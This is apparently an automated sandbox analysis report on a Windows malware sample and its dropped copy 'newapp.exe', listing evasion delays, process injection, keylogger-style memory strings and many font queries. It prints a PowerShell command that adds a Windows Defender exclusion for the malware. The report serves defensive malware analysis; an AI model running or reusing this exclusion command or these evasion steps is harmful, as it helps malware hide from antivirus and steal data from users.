Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599538	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599434	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599325	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599214	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598884	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598764	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598655	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596162	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594515	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594297	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594187	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599563
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599438
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599078
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598969
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598844
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598735
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598610
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598485
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598360
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598235
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598110
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597985
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597360
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597235
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596985
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596860
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596735
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596610
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596360
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596110
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595985
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595860
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595735
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595610
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595485
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595360
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595235
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595110
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594985
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594860
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594735
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594610
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594437
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594327
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594208
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594094
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 593985
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 593860

Source: dhPWt112uC.exe, 00000004.00000002.4164255041.0000000001592000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr{/
Source: newapp.exe, 0000000A.00000002.2000796794.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4164521969.00000000011C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\dhPWt112uC.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\dhPWt112uC.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe"
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\dhPWt112uC.exe	Memory written: C:\Users\user\Desktop\dhPWt112uC.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory written: C:\Users\user\AppData\Roaming\newapp\newapp.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe"	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process created: C:\Users\user\Desktop\dhPWt112uC.exe "C:\Users\user\Desktop\dhPWt112uC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"

Source: dhPWt112uC.exe, 00000004.00000002.4168329440.00000000034FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q8<b>[ Program Manager]</b> (11/01/2025 14:38:48)<br>{Win}THcqL$P
Source: dhPWt112uC.exe, 00000004.00000002.4168329440.00000000034FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: dhPWt112uC.exe, 00000004.00000002.4168329440.00000000034FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q9<b>[ Program Manager]</b> (11/01/2025 14:38:48)<br>{Win}rTHcqL$P
Source: dhPWt112uC.exe, 00000004.00000002.4168329440.00000000034FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q3<b>[ Program Manager]</b> (11/01/2025 14:38:48)<br>
Source: dhPWt112uC.exe, 00000004.00000002.4168329440.0000000003508000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: <html>Time: 01/26/2025 20:34:39<br>User Name: user<br>Computer Name: 910646<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 8.46.123.189<br><hr><b>[ Program Manager]</b> (11/01/2025 14:38:48)<br>{Win}r</html>
Source: dhPWt112uC.exe, 00000004.00000002.4168329440.00000000034FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt/P

Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Users\user\Desktop\dhPWt112uC.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
